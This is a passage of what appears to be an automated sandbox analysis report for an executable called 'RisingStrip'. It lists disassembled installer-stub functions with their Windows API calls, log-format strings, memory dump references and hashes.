Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263
Exec: failed createprocess ("%s"), xrefs: 004022C2

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00012A00,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

@rD, xrefs: 00404402
%u.%u%s%s, xrefs: 00404444

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

@rD, xrefs: 00404934
, xrefs: 004048DA

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

%02x%c, xrefs: 00406270
..., xrefs: 00406293

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
